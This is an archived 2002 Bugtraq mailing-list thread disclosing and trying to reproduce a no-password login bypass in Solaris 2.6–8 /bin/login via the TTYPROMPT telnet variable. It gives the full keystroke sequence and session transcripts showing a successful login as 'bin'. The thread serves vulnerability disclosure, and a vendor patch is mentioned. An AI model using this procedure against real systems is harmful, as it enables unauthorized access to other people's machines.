Re: Solaris 2.6, 7, 8

From: Roy Kidder (rkidder@corecomm.com)
Date: 10/03/02


From: Roy Kidder <rkidder@corecomm.com>
To: Bugtraq <bugtraq@securityfocus.com>
Date: 03 Oct 2002 15:03:13 -0400

Works like a champ on Solaris 2.6/Sparc:

---------- begin ----------

~ $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

SunOS 5.6

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: Thu Oct 3 14:49:33 from localhost
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have new mail.
bin@ovcle$ uname -a
SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
bin@ovcle$ who am i
bin pts/6 Oct 3 15:05 (localhost)

---------- begin ----------

On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
> Sorry but I can't reproduce this on a Solaris 7 machine.
>
> sunlight.ccs% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
>
>
> SunOS 5.7
>
> login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
> Login incorrect
>
>
> As you can see I get a request for a username/password.
>
> Ramon Kagan
> York University, Computing and Network Services
> Unix Team - Intermediate System Administrator
> (416)736-2100 #20263
> rkagan@yorku.ca
>
> -------------------------------------
> I have not failed. I have just
> found 10,000 ways that don't work.
> - Thomas Edison
> -------------------------------------
>
> On Wed, 2 Oct 2002, Jonathan S wrote:
>
> > Hello,
> >
> > Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> > environment variable TTYPROMPT. This vulnerability has already been
> > reported to BugTraq and a patch has been released by Sun.
> > However, a very simple exploit, which does not require any code to be
> > compiled by an attacker, exists. The exploit requires the attacker to
> > simply define the environment variable TTYPROMPT to a 6 character string,
> > inside telnet. I believe this overflows an integer inside login, which
> > specifies whether or not the user has been authenticated (just a guess).
> > Once connected to the remote host, you must type the username, followed by
> > 64 " c"s, and a literal "\n". You will then be logged in as the user
> > without any password authentication. This should work with any account
> > except root (unless remote root login is allowed).
> >
> > Example:
> >
> > coma% telnet
> > telnet> environ define TTYPROMPT abcdef
> > telnet> o localhost
> >
> > SunOS 5.8
> >
> > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> > Last login: whenever
> > $ whoami
> > bin
> >
> > Jonathan Stuart
> > Network Security Engineer
> > Computer Consulting Partners, Ltd.
> > E-mail: jons@ccpartnersltd.com
> >
> >
>

-- 
===================================================
Roy Kidder
Data Network Engineer
CoreComm
---------------------------------------------------
"...these products' frequent failures are 
legitimized by ubiquitous acquiescence." 
     -- Doc Searls on Microsoft products.
===================================================



Relevant Pages

  • Re: how to enable localhost and apache in slackware.
    ... application achieves connectivity to localhost once you ping it? ... system using telnet or lynx I get access denied. ... Do you have a restrictive firewall interfering with packet flow? ... Have you configured your web server to service requests from the loopback ...
    (comp.os.linux.misc)
  • Re: how to enable localhost and apache in slackware.
    ... returned from localhost? ... system using telnet or lynx I get access denied. ...
    (comp.os.linux.misc)
  • Re: clamd after upgrade to 0.83
    ... clamd.conf for placing the PID file. ... I cannot connect to the localhost as ... esmtp# telnet localhost 3310 ... telnet: connect to address::1: Connection refused ...
    (freebsd-questions)
  • [opensuse] cant get to port 25
    ... I can telnet localhost 25 can connect to postfix, ... I do have port 25 open in the firewall. ...
    (SuSE)
  • Re: Solaris 2.6, 7, 8
    ... Sorry but I can t reproduce this on a Solaris 7 machine. ... telnet> environ define TTYPROMPT abcdef ... Login incorrect ... > telnet> environ define TTYPROMPT abcdef ...
    (Bugtraq)